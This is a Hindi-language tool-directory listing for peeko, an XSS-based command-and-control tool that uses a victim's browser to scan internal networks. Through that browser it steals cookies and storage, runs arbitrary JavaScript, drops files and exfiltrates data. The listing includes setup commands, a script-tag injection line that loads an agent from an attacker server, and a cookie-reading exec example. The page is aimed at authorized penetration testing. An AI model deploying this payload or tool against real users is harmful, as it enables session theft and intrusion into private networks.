Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
peeko — peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser. | Kitploit
उपकरण/GitHubGitHub/b3rito/peeko
ReconnaissanceNetwork MappingPort ScanningLateral MovementWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingCommand and Control
GitHubb3rito/peeko
2302811 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

peeko

peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.

रिपॉजिटरी देखें
साझा करें

peeko

संस्करण: v1.1

peeko एक ब्राउज़र-आधारित XSS-संचालित C2 (कमांड एंड कंट्रोल) उपकरण है जो पीड़ित के ब्राउज़र को आंतरिक नेटवर्क के अंदर एक छिपे हुए प्रॉक्सी के रूप में उपयोग करता है।

इंजेक्ट किए गए XSS पेलोड के माध्यम से, peeko एक केंद्रीय सर्वर से WebSocket कनेक्शन स्थापित करता है, जिससे हमलावर पीड़ित के ब्राउज़र को दूरस्थ रूप से नियंत्रित करके आंतरिक सेवाओं को अनुरोध भेज सकता है, नेटवर्क स्कैन कर सकता है, डेटा एक्सफ़िल्ट्रेट कर सकता है, या यहाँ तक कि मनमाना JavaScript निष्पादित कर सकता है — यह सब बिना एक भी बाइनरी ड्रॉप किए।


विशेषताएँ

  • हमलावर और पीड़ित के बीच WebSocket-आधारित संचार
  • पीड़ित का ब्राउज़र आंतरिक URL प्राप्त करता है और IP रेंज + पोर्ट स्कैन करता है
  • सरल नियंत्रण पैनल जिसमें शामिल है:
    • पीड़ित चयनकर्ता
    • मैनुअल URL प्राप्ति
    • IP और पोर्ट रेंज स्कैनर
    • कस्टम JS निष्पादन (मैनुअल या स्वचालित)
    • फ़ाइल वितरण (स्वचालित/मैनुअल)
    • ब्राउज़र जानकारी और टोकन संग्रह (कुकीज़, स्टोरेज, आदि)
    • लॉग व्यूअर, .txt या .json के रूप में कॉपी/सेव करने की सुविधा
  • सेल्फ-साइन्ड प्रमाणपत्रों के साथ HTTPS समर्थन
  • हल्का: एक Python फ़ाइल + स्थैतिक संपत्तियाँ

आवश्यकताएँ

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (डेबियन-आधारित सिस्टम पर परीक्षण किया गया)

त्वरित प्रारंभ

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    make install
    
  3. (वैकल्पिक) स्क्रिप्ट को निष्पादन योग्य बनाएं:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. सेल्फ-साइन्ड TLS प्रमाणपत्र जनरेट करें:

    root@kitploit:~
    make cert
    
  5. SERVER-IP प्लेसहोल्डर बदलें:

    निम्नलिखित फ़ाइलों को खोलें और संपादित करें:

    • static/agent.js
    • static/control.html

    SERVER-IP को अपने सर्वर के IP/डोमेन से बदलें:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. सर्वर प्रारंभ करें:

    root@kitploit:~
    make run
    
  7. अपने ब्राउज़र में नियंत्रण पैनल खोलें:


नियंत्रण पैनल की विशेषताएँ

मुख्य कार्य

  • कनेक्टेड पीड़ितों को चुनें और प्रबंधित करें
  • पीड़ित के माध्यम से किसी भी आंतरिक/बाहरी HTTPS URL को प्राप्त करें
  • लैन रेंज स्कैन करें: 192.168.1.0/24, 10.0.0.10-20, आदि।
  • विशिष्ट पोर्ट या रेंज स्कैन करें (जैसे, 80, 443,8000-8080)

फ़ाइल वितरण

  • पीड़ित को फ़ाइलें भेजें (WebSocket के माध्यम से Base64)
  • पीड़ित का ब्राउज़र उन्हें स्वचालित रूप से डाउनलोड करता है
  • कनेक्ट होने पर स्वचालित अपलोड का समर्थन करता है

जानकारी एकत्र करना

  • User Agent, प्लेटफ़ॉर्म, रेफरर, कुकीज़, local/sessionStorage एकत्र करें
  • परिणाम JSON में देखें
  • मैन्युअल रूप से ट्रिगर या कनेक्ट होने पर स्वतः एकत्र करें

कस्टम JS निष्पादन

  • पीड़ित के ब्राउज़र पर मनमाना JavaScript चलाएँ
  • भेजने के लिए exec:... प्रारूप का उपयोग करें
  • कनेक्ट होने पर ऑटो-रन का समर्थन करता है
  • उदाहरण: exec:alert(document.cookie);

लॉगिंग

  • सब कुछ लॉग किया जाता है (अनुरोध, प्रतिक्रियाएँ, जानकारी डंप)
  • लॉग को .txt या .json के रूप में कॉपी या एक्सपोर्ट करें
  • टर्मिनल लॉग की तरह डिज़ाइन किया गया न्यूनतम UI

CORS और मिश्रित सामग्री की व्याख्या

आधुनिक ब्राउज़र नीतियाँ प्रभावित करती हैं कि peeko क्या एक्सेस कर सकता है।

CORS प्रतिक्रियाएँ

हेडरक्या सामग्री पढ़ सकते हैं?टिप्पणियाँ
Access-Control-Allow-Origin: *✅प्रतिक्रिया तक पूर्ण पहुँच
कोई हेडर नहीं⚠️प्रतिक्रिया अस्पष्ट है

मिश्रित सामग्री

पीड़ित HTTPS के माध्यम से कनेक्ट होता है। यदि स्कैन किया गया लक्ष्य केवल HTTP का उपयोग करता है:

  • ब्राउज़र मिश्रित सामग्री अनुरोधों को ब्लॉक करेगा
  • peeko http:// एंडपॉइंट से नहीं पढ़ सकता
  • स्कैन करते समय हमेशा HTTPS का उपयोग करने वाले लक्ष्यों को प्राथमिकता दें

व्यवहार में

पैनेट्रेशन टेस्ट के दौरान, यदि आपको कोई आंतरिक सेवा मिलती है जो Access-Control-Allow-Origin: * के साथ प्रतिक्रिया करती है और HTTPS पर सर्व होती है, तो peeko एक स्टील्थ प्रॉक्सी बन जाता है जो बिना कोई फ़ाइल ड्रॉप किए या आउटबाउंड कनेक्शन खोले, पीड़ित के ब्राउज़र से सीधे आंतरिक डेटा एक्सफ़िल्ट्रेट करने में सक्षम है।


प्रोजेक्ट संरचना

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

कार्यप्रवाह

  1. हमलावर XSS इंजेक्ट करता है (स्टोर या रिफ्लेक्टेड भेद्यता के माध्यम से)
  2. पीड़ित का ब्राउज़र WebSocket के माध्यम से peeko सर्वर से कनेक्ट होता है
  3. नियंत्रण पैनल हमलावर को अनुमति देता है:
    • नेटवर्क स्कैन करें
    • URL प्राप्त करें
    • कुकीज़, स्टोरेज डंप करें
    • मनमाना JS चलाएँ
    • प्रतिक्रियाएँ एक्सफ़िल्ट्रेट करें
    • फ़ाइलें ड्रॉप करें

उपयोग के मामले

  • XSS के माध्यम से आंतरिक नेटवर्क मैपिंग
  • ब्राउज़र-आधारित पिवोटिंग
  • साइलेंट फ़ाइल डिलीवरी / JS ड्रॉपर

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
जिन वातावरणों में आपके पास स्पष्ट अनुमति है, उनके बाहर peeko का कोई भी उपयोग सख्त रूप से निषिद्ध है।
आप अपने कार्यों के लिए स्वयं ज़िम्मेदार हैं।


लेखक

द्वारा लिखित: b3rito, mes3hacklab पर और GioPpeTto

टूल डाउनलोड करें
root@kitploit:~
https://192.168.30.136:8443/static/control.html
  • एजेंट इंजेक्ट करें (उदाहरण XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    
  • प्रतिबंधित ओरिजिन
    ❌
    अवरुद्ध या अपठनीय